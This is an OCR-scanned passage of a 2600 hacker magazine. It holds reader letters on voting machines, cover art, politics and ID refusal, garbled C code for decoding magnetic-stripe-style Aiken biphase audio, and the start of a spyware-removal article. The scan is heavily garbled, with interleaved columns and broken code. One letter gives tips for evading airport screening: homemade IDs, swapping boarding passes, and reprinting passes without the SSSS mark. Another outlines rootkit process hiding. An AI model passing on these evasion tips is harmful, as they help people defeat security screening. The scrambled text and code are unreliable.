, I'm writing about WhiteHat's letter about date format the lock on just one voting machine.
' Please withhold any identification for fear of Govern- Jeez, some people w i l l believe anything.
\

ment retribution. Daniel Gray


I t ' s hard to believe that it's this cut and dry. For one Defiance, Ohio
thing, it would be monumentally stupid for one party to Let us start b y saying that's t h e coolest sounding
have this kind o f control and t o attempt any sort o f name o f any city i n America. As for t h e Diebold issue,
corruption. Yet there are confirmed reports that are hard there are simply too many weird things g o i n g o n to be ig-
to excuse. We can only hope that this is thoroughly nored. The lack o f open source software, paper trails, o r
investigated and that the truth will come out. overall accountability i s troublesome a t best. The issues
you cited have n o t been resolved as n e a t l y as y o u seem
Dear 2600: to think. And we couldn't find t h a t q u o t e from the media
There needs t o be a correction i n Purplesquid's letter y o u cited above anywhere. Put simply, this i s n o t about
(21:4). The way he gave the information was lackluster Republicans and Democrats. I t ' s n o t a b o u t the Nether-
a t best and totally out of context a t worst. lands. I t ' s about setting u p the most i m p o r t a n t computer
While indeed a voting machine had 4258 votes on it system i n our nation's history and d o i n g it in a way that's
i n Ohio, it was located and the votes were deleted two fair and accountable to everyone. This isn't accomplished
hours beforethe polls even opened according t o the U.S. through secrecy. As long as such secrecy exists, there
and State Election Boards and documented by both t h e will always be doubts and there will always b e rumors. I f
Democratic and Republican National Committees. Squid you want these to go away, then t h e r e has t o be some
gives the impression that these votes were counted and level o f accountability. And so, we propose t h e following
that is totally false. t o Diebold: l e t us hack your machines a t t h e next HOPE
According t o all the investigations by the press and conference i n 2006. We will operate t h e system as if we
the Federal Election Commission, there was no difference were an election board. We will try t o cheat. We will try to
between the results with t h e paper trails and the states create problems o f a l l sorts. And i n t h e end, we will l e t
that didn't have paper trails. Seems t h a t Squid's informa- everyone know what we learned. What possible reason
tion is yet again i n error. could there be for n o t accepting such a challenge?
I n Baker County, Florida, there again was no problem
with t h e vote. I n t h e last eight presidential elecfions, Dear 2600:
the voters i n this county have repeatedly gone t o the Re- I n response t o Forgotten247's a r t i c l e i n 21:4, utiliz-
publicans and this has been documented so by none i n g several tools available on t h e open market (such as
other then the Florida State Election Commission and t h e sysinternals.com) and having a detailed knowledge of a
U.S. Federal Elections Commission and the results are on baseline Windows system (which Iassure you, many se-
file a t the U.S. Library of Congress (http://www.loc.gov). curity professionals do), your stealth methods are ill
Considering that it is a federal felony i n the U.S. t o fal- conceived and negligible. If you really wish t o create a
sify these forms, Ihighly doubt that any sane person stealth application that cannot (easily) be found, you
would want t o spend any time i n prison because o f this need t o create a kernel Level rootkit t h a t can interrupt
for any reason. This means that every presidential elec- system calls (both Windows API and Raw) t h a t request
tion from Carter through Reagan-Bush-Clinton and back information for t h e program files a n d process informa-
t o Bush has been documented i n this county, and t h e tion i n question. I f you can p u l l t h a t off, then t h e only
people who did the investigation were the Florida Demo- wav t o semi-ieliablv detect vour "hidden" orocess would
cratic Party with help from the Democratic National Com- b e t o do a f u l l disk analysis From a different 0s. Now it is
mittee. Yet another myth being passed around as true i n still possible theoreticallv t o hide t h e f i l e from even this.
a country that has tried t o get U.S. forces out of other but t h a t would take a l o t o f research a n d i n depth knowl-
European countries by any means possible since t h e end edge of file systems, t h e registry, a n d t h e like. Best o f
of WW2, and forget the simple fact that these countries luck on your stealthing endeavors. B y t h e way, a virus
have asked us t o stay. Could it be that t h e Netherlands scanner would detect your "stealthing" methods as soon
are pissed they do n o t have any U.S. bases there, and as as a copy of the exploit made it across t h e desks o f any
such do not receive any benefits from same? Like sales relevant researcher. Possibly sooner.
and taxes? The Stealthed One
Now while hacking a Diebold machine was widely re- (yeah, Right!)
ported on t h e net as being possible, even ABC-NBC-CBS-
CNN all admitted that they Tumped t h e gun on this story Dear 2600:
and had no f a e u a l data t o back this up nor prove it ever Thanks for your words i n t h e "Stick Around" piece i n
happened." And the people that said they hacked this 21:4. Iwas beginning t o feel a little overwhelmed, as I ' m
machine were unable t o do it i n front of witnesses. Now sure we all do a t times. What you said was just what I
isn't that strange that you can hack something only needed t o hear. It's good t o be reminded t h a t we are, i n
once? Once you have your way in, unless the whole ma- fact, legion. The greed-mongers, fascists, warlords,
chine i s reprogrammed (and this machine was not as it megalomaniacs, and those who spread fear for their own
was placed under lock and key after t h e hacking was gain will realize thatthey're t h e ones w h o should be wor-
stated), then why couldn't these people hack this with ried. After all, there really are a l o t m o r e o f us than there
witnesses watching? Something stinks i n t h e Nether- are of them. The power is i n a l l our hands. Their only real
lands and methinks it is what PurpleSquid is being told. power lies i n our own self-doubt. You know t h e quote
Maybe PurpleSquid should stop reading magazines i n about good men doing nothing. Well, I ' m going t o do my
the Netherlands that are equal t o t h e supermarket part. Thank you again for your words o f encouragement
tabloids (Enquirer, News o f the World, Star, etc.) here i n and, of course, for your truly rad a n d absolutely neces-
the States, and pay more attention t o information that sary publication.
can actually be used, like your magazine. Chaad
L
ear 2600: turned the pages. So just t o be cautious Iplaced the ma>
Ijust finished reading battery's great article on Tick- discreetly i n my bottom drawer and saved the reading for
etmaster i n 21:4. Ibuy tickets there frequently and Iwas later when Iwas sure no one was looking. Ireturned t o
wondering if anyone out there has had t h e chance t o my drawer three hours later t o find that it was none
look under the hood of t h e virtual waiting room system. other than George W. Bush himself who was watching
Ihave been trying t o figure out the mechanism that me!
specifies your place i n "line." I would just like t o read one issue i n peace.
Also, concerning Cabal Agent # l ' s response t o jason
Zourick about Linux systems i n the federal government
i n 21:4: Am I the only one who is annoyed by the half Dear 2600:
page of bureaucratic acronyms that boldly proclaims that While sitting i n class reading 21:4, Iread a Letter
Linux is not certified for federal use? Iapplaud the agen- about subliminal messages i n the cover art. So Iflipped
cies and the admins that are using Linux without autho- the magazine over and under the Lighting Isaw the word
rization! Especially since common citizens like you and "erase" on the closest tombstone. Enlightened, Imoved
me are footing the bill for massively over-architected it under the light t o see I f I could find anything else.
systems that are designed by these bureaucrats who have Then a l l of a sudden Bush's face appeared and scared the
no incentive t o do things cheaply. crap out of me. Inormally don't Like t h e sight of him a t
Ski l l c r a f t any time so suddenly seeing him hidden i n the cover sur-
prised me a bit. Once I got home from school Iput it un-
Cover Letters der a black light which makes the words very apparent. I
also scanned 21:2 and Isaw the word "OBEY" and i n 21:3
Dear 2600: Isaw "PROTECT" written i n it. Iwill now be scanning
Love your magazine! It was recommended by the in- every issue for more surprises.
structor a t a Microsoft class Iwas taking. So Ibought a mr-bloko
magazine and later subscribed. I j u s t received 21:4. Iwas
wondering about the pale image o f a face on the front Dear 2600:
cover. Idon't really recognize the face, but Ican see it Thanks for such a great magazine and a beautiful pic-
there on the upper right corner, among the trees. Whose ture of good ol' GW on the cover. So patriotic, yet so very
face i s i t ? Why i s it there? scary!
anonymous Alex
Please allow us to ask the questions.
Dear 2600:
Dear 2600: Ido not usually write but had t o say something. I
I see George Bush. saw something. Ithought it was a stain left by my drink
on the cover of 21:4. However, it was a different type o f
All the time? stain. I n the right corner. Startled me. Thanks for the
great magazine.
Dear 2600: miles bogus
Well, I'm taking the cover of 21:4 literally and I'm
saying something about what Isee. Isee Mr. George Dear 2600:
Bush's head i n the corner and Isee the black tombstone Honor. Obey. Protect. Erase. Bush?
below him. Isee the images of past 2600 magazine cov- DigitalDesperado
ers on the tombstones beside corporate logos and mas-
Dear 2600:
cots, and the word "ERASE" on the tomb numbered
especially for all of you. And don't think Ioverlooked the
I really dig the UVink used Lately. I've noticed it for a
while and since nobody else has said anything (other
"SSSS" which will get you searched before getting on an
than the fact that sometimes they see it by reflection), I
airplane.
thought Iwould mention it.
One of the reasons ILove 2600is because of the cre-
ative (and more often than not cryptic) cover which Thanks for continuing t o put out a great mag for all
accompanies every issue. Keep up t h e great work! these years!
Fa ber Martian

Dear 2600: Critiques


Following t h e advice on t h e cover of your new issue
("if you see something, say something"), Inoticed the ... Dear 2600:
I have been a long time fan o f your magazine. How-
uh ... ghostlike image of Gee Dubbya over the graveyard.
Very nice touch. I'm not completely sure what it's sup- ever, Ibelieve that politics needs t o be left out. Ilike t o
posed to mean, but it's cool. As for your magazine, keep read and be informed o f technical issues and Iknow peo-
doing what you're doing because it kicks ass. ple from New York loathe Bush because, let's face it, he i s
john2kx a Republican. New York is not known for their support o f
Republicans and Iunderstand you are pissed off that he
Dear 2600: won and need t o vent. But please do not do it i n this
So Ijust picked up the Latest copy of 2600and as al- magazine. Iknow you think it is cute t o put Bush on the
ways I couldn't wait until I was i n the privacy of my office cover and whatever but Icannot go anywhere without
with the door shut (to avoid any suspicious onlookers) t o hearing about politics. It is over and Isuggestthe people
crack open the first page. Somehow Istill felt uptight as get over it. Yes Iagree with rights, Iam an anti-federal-
\though someone was watching over my every move as I ist, and Ibelieve i n state rights. Ido n o t believe Bush is

ZbOO Magazine 1
6 warmonger and I do not believe t h a t terrorists should on your mind is a good thing. We're g l a d y o u
be sent into a court like we should. opportunityand hope you understand w h y we'll
With t h a t said, I agree t h a t U.S. citizens should not t o give others t h e chance.
be subjected t o random searches of their houses without
their knowledge and Americans should not be held with- Problems
out trial, lawyer, and so forth. You have my support 100
percent on that. However, i f we capture terrorists or Dear 2600:
someone who we suspect is a terrorist (who is not an I n case you haven't heard, t h e company ChoicePoint
American), then I don't care i f they don't have n'ghts, be- has been selling personal data (Social Security numbers,
cause they don't! The Geneva Convention does not grant phone numbers, addresses, etc.) t o companies. Someone
them this right at all. As far as torturing them, i f i t saves created a fake company and ordered i n f o on 145,000
our troops' lives, go for i t . We did not start this war and people and so far 50 suspicious credit accounts have
our soldiers should not die because we are t o o afraid t o been created i n t h e names of people w h o have had their
let them go without sleep because a bunch of left wing identity stolen. This is beyond wrong. T h e criminalin this
nut jobs are protesting them t o regain their lost power. case is ChoicePoint! ChoicePoint and every company like
I know most "hackers" are really left wing and are al- them should be shut down! I f t h e U.S. government
most communist. Granted, I cannot group all of them in refuses t o do something about these companies I hope
t h e same category since I believe my stance is right wing someone else does.
even though Bush is t h e first Republican president I have Phreakinphun
voted for. Making people aware of their rights is one Dear 2600:
thing, telling them they are losing them is OK, but t o
I just wanna say all t h e usual "I love your magazine"
blame i t on one man is a joke. It is both parties' fault
stuff before I say what I have t o say. I d o love i t and I've
that we have our rights degraded as far as they are now been reading i t for two years now.
(Lincoln started this with t h e backing of a strong federal This weekend I went t o pick up 21:4 and almost had a
government). But it's even more t h e fault of t h e Ameri- canary i n t h e magazine shop when i t w a s $15 Canadian!
can peopte because they have let i t slip this far. I f you I thought for sure i t was a mistake and asked t h e lady i f
ever watch Jay Leno's jay-walking or Sean Hannity's man she accidentally put t h e wrong price o n t h e magazine.
on t h e street quiz, t h e majority of people my age and She replied t h a t she hadn't and t h a t i t was now $15
younger (23) have no clue who t h e vice president is or everywhere. I couldn't believe i t - I almost died. I liter-
what t h e amendments are. Let alone t h e Bill of Rights! I ally sat i n t h a t magazine shop and deliberated o v e r i t for
know I have turned this into a political rambling and I 20 minutes. Was i t worth i t or not? Of course i t is. But i f
am sorry but I beg of you, please, no more. Talk about I have t o pay more, I would like t o voice some concerns.
rights, talk about how they are being taken away, but be First off, I just have t o say t h a t close t o a 50 percent
as partial as you can. I cannot take anymore "Left hates price hike is a huge price hike and I have a feeling t h a t i t
America, Right are fascists taking our rights away" pro- may deter a lot of readers. How have you handled t h e
paganda. price hike with t h e subscribers?
Rage1605 Secondly, I felt completely ripped o f f when I read
Nice j o b keeping politics out. Or did you mean for us about 50 percent of t h e letters (my f a v o r i t e part of your
t o stop talking about these issues afteryou talked about magazine) were written by teenyboppers who are plan-
them? First off, we discuss a l o t o f things and the space ning a DOS attacks on their school networks. I mean who
taken up by this kind o f a topic has always been fairly are these kids and why do you keep publishing these let-
minimal. Second, i f it's something that's on people's ters? I think we need t o get over t h e w h o l e idea of "what
minds, then why should we deny them the right t o ex- makes a hacker" letters. I mean either you get i t or you
press themselves? Like anything else, hackers have inter- don't. My suggestion: have a page t h a t defines "hacker"
esting perspedives on these issues. Plus, it's generally a as you see f i t . but please don't f i l l up t h e letters pages
good thing t o express yourself and expose yourself t o with them anymore. Please.
other opinions. I don't mean t o rip on you completely and of course
Having been exposed t o your opinions, we cannot re- there is still usefulinfo. I just feel Like I have t o dig a bit
act with silence. You believe it's acceptable t o abduct more t o find i t than I used to.
people from foreign countries and torture them? We andehlu
hope you realize that there are many people throughout Whoever sold you t h a t magazine r i p p e d you o f f Our
the world who have the desire and would have the right price in Canada has n o t increased f o r some time. Our
to do the same t o you underyour own logic. I f that's the price is $8.15 i n Canadian dollars ( w h i c h would make
worldyou want t o live in, you're well on the way towards such an increase closer t o 100 percent than t o 5 0 per-
gem'ng there. You say we didn't start this war? We in- cent). We suspect someone covered t h e "8" and con-
vaded a country that never attacked us and had neither vinced you that i t was 1 5 dollars. It's either incredibly
plans nor ability t o do so. Regardless o f what kind o f so- sleazy or incredibly stupid. Either way, march back there
ciety we manage t o create over there, you can never es- and demand a refund.
cape that fact. You obviously have all kinds o f problems
with whatyou imagine t o be the "left wing." But these is- Dear 2600:
sues are o f concern for people o f all political bents. I am saddened by t h e current s t a t e of affairs in this
Hackers come from all kinds o f different political back- country. To begin with, I recently read a survey i n which
grounds and ideologies so please don't assume that they a majority of high school students did n o t know what t h e
all believe the same thing. One thing that most would First Amendment of t h e Constitution provided. When
, probably agree upon is that expressing something that's read t h e exact text of t h e First Amendment, more than
6 n e third of the students felt it went "too far" i n the Complaints to the store manager usually are enough to\
rights it provided. Furthermore, only half of the students resolve the situation. I f this doesn't work, l e t us know
surveyed felt that newspapers should be allowed t o pub- the specifics.
lish freely without government approval. Three quarters
of students polled said that flag burning was illegal and Dear 2600:
about half of them said that the government had the au- Iwas on vacation recently i n Michigan t o see some
thority t o restrict indecent material on the Internet. This friends. While there, Istayed a t both a Baymont I n n and
almost makes me cry! We Live i n a country where the a Days Inn. While a t the Baymont Inn, Ihad good unre-
Leader has publicly stated t h a t he would prefer a dicta- stricted wireless access. No one tried t o censor all the
torship, where blatant election fraud has occurred i n the porn or hacking sites Ivisited and downloaded from. Not
form of unverifiable ballots, where t h e common public a problem. Ihighly recommend them. About halfway
thinks that asking questions about government actions through my trip, Imoved over t o a nearby Days I n n due
is unpatriotic, and now, t h e future of the country thinks t o price range considerations. While a t the Days I n n I
that we have too many freedoms. I urge everyone who had relatively good cable access and Iwas satisfied. To-
reads 2600, anyone who believes t h a t information wards the end of my stay, Iwas abruptly cut off i n the
should be free and that speech is free, t o speak up and middle o f a download from astalavista.com. Ithought
speak out against this tide of complacency. It is our re- the site was down and Icontinued surfing, noting as
sponsibility t o be critical of our government. I f we do not time went on that Icontinually received time out mes-
act, the fiction of 1984 w i l l become our reality. sages from them. Eventually when I got t h e same mes-
Alop sage from 2600.com and a number of other sites, I
I n a l l fairness, we don't believe Bush was actually realized it had been blocked by whatever server they
wishing for a dictatorship b u t simply attempting to make were using t o manage connections at the hotel. This was
one o f those points o f his that never really took off. But annoying but Iwas willing t o Let bygones be bygones. I
your warnings are definitely right on target. Being aware connected t o a proxy and was happily downloading for
and awake are essential for the future. about two hours before the admin cut o f f access t o my
proxy. Well, needless t o say, this pissed me o f f t o no end.
Dear 2600: Iswitched off t h e proxy and wrote their corporate head-
Iattended a 2600 meeting for the first time at the
quarters a nasty note stating that Iwould never patron-
Barnes and Noble i n the Baltimore Harbor. Iam disap-
ize any establishment of theirs again and that Iwould
pointed t o find out what goes on. When Ishowed up I
highly recommend all my friends find other accommoda-
was told that nothing really goes on buttalking between
tions unLess drastic action was taken and Iwas given an
others who show up. This i n no way constitutes a meet-
apology. To date I've received neither a reply nor an ac-
ing. Instead, it's a live chat room you feel awkward join-
knowledgment. So this is me recommending to all the
ing. I was under the assumption that everyone was able
happy hackers out there not t o ever visit Days Inn.
t o attend a 2600 meeting but I never plan t o read an-
Jon
other 2600 article or attend another 2600 meeting
The one thing you didn't tell us was what excuse they
again. After getting the cold shoulder from all a t the
meeting and no response from the webmaster of the gave for cutting you off. Did they specifically state that
Maryland 2600 meeting site (who is not keeping it up- they were monitoring what you were downloading? This
dated), Iam now writing t o you t o please step i n and do doesn't make a great deal o f sense.
something about this chapter of lame so-called hackers
i n Maryland. Ideas
"Yan Dear 2600:
Since you're never going to read us again, there's re- Iwish Ihad been introduced t o this magazine sooner
ally no way we can address your concerns to you. But it than a year ago. I was actually pretty surprised when I
should be understood that these are n o t meetings with found out that a store i n t h e East Boonies of Maine car-
lectures and agendas b u t gatherings where everyone is ried it and, ever since, I've been obliged t o pick it up.
free to converse with whomever they choose i n a public
Naturally, when I had an interesting thought about
area. We're sorry ifyou're n o t comfortable being a part o f
America's newest catch phrase, 2600 was the first place I
this b u t that's how it is. We encourage all who attend
thought of sending it. So here it is:
to be open to newcomers and n o t form cliques. And new-
Freedom isn't free. Iknow this motto has been circu-
comers should avoidjumping to conclusions.
lating around the country for a t Least a few years now, i n
Dear 2600: hopes that people w i l l realize a sacrifice has t o be made
Ihave been purchasing your magazine (when Ican t o preserve freedom. But i s this a l l the slogan really
find i t ) for the last four or five years and want t o let you means? Freedom isn't free could mean something com-
know that Ifound it, but not without some digging. It pletely unintended. If we stop thinking i n terms of cost,
seems that Barnes and Noble carries your fine publica- t h e saying becomes more of a slogan for the trends i n
tion but chooses t o keep it hidden away i n a drawer. Af- the U.S. as Iunderstand them. Freedom isn't free, man,
ter searching for a minute ( I don't have a l o t of it's i n prison. Or a t least headed that way. Do you seethe
patience), Iasked the cashier where it was. She showed subtle transition there? With a different connotation, a
me and didn't give me a reason as t o why it is hidden very popular saying for the defense o f the government's
awav. actions overseas becomes a slogan fit for the posters of
Chris Big Brother's Oceania. Freedom isn't free, not com-
This is n o t Barnes and Noble policy b u t rather that pletely, not yet. I'm just glad t h a t there are people out
,o f the local store or even o f that particular person. there, you and others, who are working i n its defense.
' Thank you for trying t o educate the masses. Little people for not having "proper" I D or n o t conforming t o
\

more than a year ago, Iwas one of them. visual or behavioral expectations. And explain t o me why
Tommy a terrorist would do something that everyone knows will
You most definitely have a future i n mass marketing. get you a special screening, such as buying a one-way
ticket, flying standby, or buying a t t h e last minute? I
Fighting Back mean, do we really think that someone who intends t o
Dear 2600: blow himself up would be concerned w i t h t h e added cost
I'm typing this a t 36,000 feet after reading the re- of a round trip ticket? Or that they'd p l a n it a t the last
cent article on identification and airline security. As a minute and not buy a ticket i n advance?
frequent business traveler, old hacker, and semi-anar- Often Iwill use one of my handmade I D documents,
chist, I've had plenty of time t o experiment with airline and never have had one questioned. Some are purposely
security and identity documents i n both air travel and not-so-good creations, but they never get questioned.
general use. I'm thinking a six year old's crayon rendition o f a driver's
First off, Ialmost never use any sort of I D document license would be good enough for these minimum wage
and on the rare occasion that Ido, it's nearly always a workers. Most of the time they don't look closely enough
"fake" one. Isay "fake" because Imake it a point of using t o detect something obvious. When traveling with oth-
ID that Ihave created myself, but that contains realinfo. ers, Iusually talk them into switching I D and boarding
Why? To prove the point that fake documents will fly (no passes with me. The security people have never noticed
pun intended), but without exposure t o persecution for this. For the most part they just want t o match the name
having false documents. There is nothing illegal i n this. on the boarding pass with the ID. I f t h e y did notice, we'd
Actually, possession or use of false documents itself is simply explain that we got them mixed u p when picking
generally not illegal, but using them for fraudulent pur-
them up from the ticket counter.
poses is.
Now let's talk about the matter o f t h e Scarlet Letter
Iencourage everyone t o refuse t o use ID for every-
day things. Simply refuse it, or say you don't have it, or on the boarding pass t o signify people who are selected
whatever. I n many, many years of doing this, it has never for "random" special inspections. One thing should be
stopped me from doing what Iwant. When asked i f Ihave real obvious here; it's just a piece of paper. A boarding
ID for a credit card purchase, for example, Isimply say pass, which Iprinted on my own computer. To be more
"no." Sometimes Iget a deer-in-headlights look, some- clear, one copy of the boarding pass. A l l you need is a
times a question or two, but never has someone refused second copy without the symbols, and t h e security peo-
my purchase! ple won't know how "special" you are. Of course, it's
Remember that you can't be forced t o give ID t o the probably illegal t o do this, so I'm n o t admitfing t o ever
police i f you're not driving a vehicle. A recent Supreme having tried it nor encouraging you to. But if you were
Court case has been touted as changing that, but it does to, say, print two copies just for safety, and then forget
not. The recent decision merely says that you must iden- and pull out the "wrong" one, Ithink it would be pretty
tify yourself during an investigation, but does not say tough t o prosecute you.
you must show identification documents. Ihave used Identity documents i n general a r e pretty useless
this a number of times during civil disobedience activi- right now since they are easily faked, b u t unless we fight
ties with 100 percent success (meaning I've never been back, there will come a time when they are demanded for
arrested for it). Ihave had cops literally spith'ng on me
anything you do. Eventually there w i l l be systems i n
through anger a t my refusal t o provide anything more
place for nearly anyone t o check your document against
than my name, but they knew better than t o arrest me
a database, and of course, they will l o g t h a t "for system
for such a non-crime. You must also refuse t o give your
birth date and Social Security number, as either of those security." Meaning, a trail of your movements and activi-
items will serve t o fully identify you with a computer ties w i l l be generated. Already i n my home state the bars
search, and void the purpose of refusing t o show ID doc- can subscribe t o a service which will read and verify the
uments. data on the magnetic strip on a driver's license. How
When flying, Itry t o have fun with the security long before you have t o authenticate yourself t o use the
goons. On many flights Iuse an expired ID. Most of the library, public wifi, buses/trains/airplanes, or anything
time they don't notice this, but often they will and "se- else?
lect" me for specialinspection. As most of you know, this Refuse t o use ID as often as possible, while you still
means putting four "S" symbols on my boarding pass and can. "Principio obstate." (Resist from t h e beginning.)
then doing +hand search of my laptop case and body. saynotoid@gmail.com
The ludicrousness of this should be obvious; the terror- Thanks for the words o f wisdom. It's always a goo0
ists we are supposedly trying t o stop all had proper, cur- idea to challenge whatever system i s being crammeci
rent, and valid U.S. I D documents! And why does expired down our throats b u t i n such a way as t o n o t putyourselr
ID matter? Does it stop being me on the day that it ex- a t risk unnecessarily. We j u s t wonder how long such
pires? There can be no valid security reason t o require a
things will still be possible.
current ID versus an expired one.
The hand search implies another thing t o me; they
obviously must know that the X-ray and metal detector
screenings are insufficient t o assure security. Imean, if to letters@26OO.com or use snail mail:
they are effective, then why the special screening? That 2600 Letters, PO Box 99, Middle Island,
,or the motive for the special screening is t o punish NY 11953 USA.
Page 45'
i n e -^
f int i;
short int max = 0;

I 1' pauses until the dsp level is above the silence threshold

yiE:lence-pau.e(int
file descriptor to read from
[silence-thresl silence threshold ' 1
fd, int s i l e n r ~ t h n s )

1
short int buf = 0;

while (buf < silence-three) ( 1' loop while silent +I


xreadlfd, Lbuf, sizeof (short int)); 1. read from fd ' 1
'
I* absolute value *I

1' get8 a sample, terminating when the input goes below the eilence threshold
[fdl file descriptor to read from
[sample-rate] sample rate of device
[sllence_thres]silence threshold
'* global f *
[sampleI sample
[sample_sire] n d e r of frames in sample * I
void get-dsp(int fd, ~ n tsample-rate, int silence-thres)

int count = 0, eos = 0, i;


short buf;

sample-size = 0;

silence-pause(fd, ailence_thresl; I * wait for sample * I

/ * fill buffer *I
.
while (leos) (

sample = xrealloc(sample, sizeof (short int) * (BuF-SIZE (count + 1)));


for (i = 0; i < BUF-SIZE; it+) (
xread(fd, Lbuf, sizeof (short int));
sample[l + (count BUF-SIZE)] = buf;

COUnttt;
sample-sire = count BUF_SIZE:

eos = 1; 1. check for silence .I


if (sample-sire > (sample-rate END-LENGTH) 1 1000) {
for (I = 0: i < (sample-rate ' END-LENGTH) / 1000; i++) {
b ~ f= 8amplellCOUnt * BUF-SIZE) -
I];
if (b"f < 0)
b"f = -buf;
if (buf > silence-thres)
eoa = 0:
I
1 else
eos = 0;

1' Open the file


[fdl file to open
[verbose] verbosity flag
global r *
+"

[sample_size]number of frames in the file * I


SNDFILE *sndhle_init(int fd, int verbose)
1
SNDFILE .snd6le;
SF-INFO sfinfo:

memset(Lafinfo, 0, sizwf(sfinfo)l; I* clear sfinfa structure *I

sndhle = sf_open_fd(fd. SFM-READ, Safinfo, 0); I* set endfile from Ed * I


if (sndhle == Null) (
fprintf(stderr, "**+ Error: sf-open_fd() failed\n");
enit(EXIT_FAILURE);
1
if [verbose) { I' print some statistics * I
fprintf(stderr,t.." Input file format:\""
' Frames: %i\n"
" sample Rate: %i\n"
' Channels: %i\""
' Format: Ox%OBx\n"
" Sections: %i\n"
" Seekable: %i\n',
(int)sfinfo.frames, sfinfo.samplerate, 8finfo.channels.
sfinfo.fonnat, sfinfo.sections, sfinfo.seekable);
I

".*.
if (sfinfo.channels I= 1) { I* ensure that the file is mono +

I
fprintf(stderr, Error: Only monaural files are supported\n");
exit(ExIT_FAILuRE);
I
s m p l ~ s i z e= s M f o . f r m s ; / * set sample eize fl
retnrn andrile;

\Spring zoo5 P a g e 47
[sndfilel SNDFILE pointer from sf-open() or sf-open-fd()
* * global **
[samplel sample
[sample_aizel number of frames in sample * /

sf-count_t count;

sample = xmalloc(sizeof(sh0rt int) * sample_size); I' allocate memory *I

covnt = sf-read-short(and5le. sample, sample-size); / r read in sample * I


if (count I = sample-size) {
fprintf(etderr, ''*- Warning: expected 6i frames, reed %i.\n",
sample_8ire, (rnt)count);
sample-size = count;
)

I * decodes aiken biphase and prints binary


[frepthres] freqvency threshold
* * global *'
[sample] sample
[sample_sizel n d e r of frames in sample * I
void decode_aiken_biphase(int frecthres, ~ n tsilence-thres)
(
z n t i = 0, peak = 0, ppeak = 0;
~ n t *peaks = NULL, peaks-size = 0;
int zerobl;

for (i = 0; i c sample_size; i++) I * absolute value * I


if (sample[il < 0)
sample[il = -sample[i];

i = 0; I* store peak differences ' 1


while (i c sample-sire) {
ppeak = peak; I* old peak value '/
while (sample[il i= silence-thres 6 s i c sample-size) / * find peaks ' 1
it+;

I
peak = 0;

I
while (sample[il > silence-thres 6 6 i < sample_size) (
if (samplel~l> sample(peak1)
peak = i;

peaks -
(peak-ppeako) (
xrealloc(peaks, aizeof(int)
peaks[peaks_size] = peak - ppeak;
+ (peaks-sire + 111;

peaks-$l=e++;

I* decode aiken biphase allowing for


frequency deviation based on frecthres * I
/.~gnorefirst two peaks and last peak '/
.. .
zerobl = oeaksl21:
for (i = 2; L < peaks-size -
1; i++) {
if Ipeaks[iI < (lzerobl / 2) + (frepthres (zerobl 1 2) 1 100)) h b
peaks[il > ((zerobl / 2) -
(freq-thres * (zerobl / 2) 1 100))) (
if (peaksli + 11 < ((zerobl I 2) + (frecthres (zerobl / 2) / 100)) 6s
peaksli + 11 r ((rerobl I 2 1 -
(freq-thres * (zerobl I 2) 1 100))) (
printf("1");
zerobl = peaks[i] * 2;

I
else if (peaks[il c (zerobl + (frepthres zerobl / 100)) 66 +

-
peaks[il > (zerobl (fre~thres* zerobl / 100))) (
printf(*O");
Xifndef DISABLE-VC
zerobl = peaks[il;
#endif
)

I * main +I
int main(int srgc, char *argv[])
int fd;
SNDFILE "endfile = NULL;

/ + codquration variables e l
char *filename = NULL;
int auto-thles = ?.UTO-T11El, Y-level = 0, ~ 6 ~ s n d 5 l= e0. Verbase
~ n tsample-rate = SAMPLE-RAW, silence-thres = SILENCE-TARES;
- 1;

I* getopt variables f /
int ch, option-index;
static struct option long-options[] = (
("auto-thres', 0, 0. ' a ' ) ,
("device", 1, 0 , ' d m } ,
{"file", 1, 0, '£'I,
("helo". 0. 0. ' h ' ) .

("silent", 0, 0, ' s ' } ,


("threshold', I , 0, 't'},
("version", 0. 0. ' v ' l ,

/. process command line arguments +I


while (1) (
/ if (eh == -1)
break;

switch (Ch) (
case ' a ' : I * auto-thres * I
auto-thres = atoi(optarg);
break;
case 'd': I + device .I
filename = xstrdup(optsrg);
break;
case 'f': I * file ./
filename = nstzdup(optarg);
uae-sndfile = 1;
break;
case 'h': / * help * /
print-help(stdout, argv(0l);
exit(Ex1T~succEss);
break;
case 'm': I' max-level f /
maxlevel = 1;
break;
case ' 6 ' : I' silent * I
verbose = 0;
break;
case 't': I * threshold +I
auto-thres = 0;
silence-three = atoi(optarg);
break;
case ' v ' : I* version * I
print-version(stdout);
exit(EX1T-SUCCESS);
break;
default: I* default +I
print-help(stderr, argv[Oll;
exit(EXIT_FAILURE);
break;
1
)

if (verbose) 1 I * print version +I


print_version(stderr);
fprintf(stderr, ''\"''I;
I
if (use-sndfile && ma%-level) ( I* sanity check * I
fprintflstderr, "*+' Error: -f and -m switches do not mixl\n");
exit(EX1T-FAILURE);
)

~f (filename == NULL) I * set default if no device is specified *I


filename = xstrdup(DN1CE);

if (verbose) I* open device for reading * I


fprintf(stderr, ' ' W * Opening Es\n", filename);
fd = open(fi1ename. 0-RDONLY);
if (fd == -1) {
perroc( "open() " 1 ;
exlt(EX1T-FAILURE);
1
~f (use-sndfile) I* open endfile or set device parameters ' I
sndGle = sndGle_init(fd, verbose);
else
sample-rate = dsp-initlfd, verbose);

if (max-level) ( I. show user maximum dsp level +I


print-max-level(fd, sample-rate);
exit(EXIT_SUCCESS);
1
if (!silence_thres) ( I * silence-thres sanity check + I
fprintf(stderr, "*" Error: Invalid silence threshold\n");
exit(EXIT_FAILURE);
I
if (use-sndfile) f t read sample ' 1
get_sndfile(sndfile);
else
9etLdsPlfd5 sample-rate, silence-thres);

if (auto-thees) I * automatically set threshold ./


silence-thres = auto-thres evaluate_max() I 100;

if (verbose) I +print silence threshold * I


fprintf(stderr, " * * + Silence threshold: %d (%d%$ of max)\n",
silence-thres, auto-tnres);

decode-aiken>iphase(FREQ-THRES, silence-thres); I * decode aiken biphase +I


close(fd1; I ^ close file * I

I * free memory ' I

\ s p r i n g looii Page 49 1
by LoungeTab Adaware SE http://www.majorgeeks.co~n/down
LoungeTab@hotrnail.com ~load506.html
This is an article i n response t o "Scumware, SpySweeper http://www. webroot.com/wb/down
Spyware, Adware, Sneakware" i n 21:2. First I -loads/index,php
would like t o commend shinohara on writing a HijackThis http//www.spychecker.com/program
great article about the nastiest of nasties. One ,/hijackthis. html
thing I noticed was where he said MSCONFIG was Now go ahead and restart your computer into
available i n allversions o f Microsoft since 98. Ac- Safe Mode (hit F8 before the Windows splash
tually, MSCONFIG isn't included with any installa- screen comes up). After your computer has
tion options of Win 2k, but any version o f booted i n t o safe mode you will want t o first run
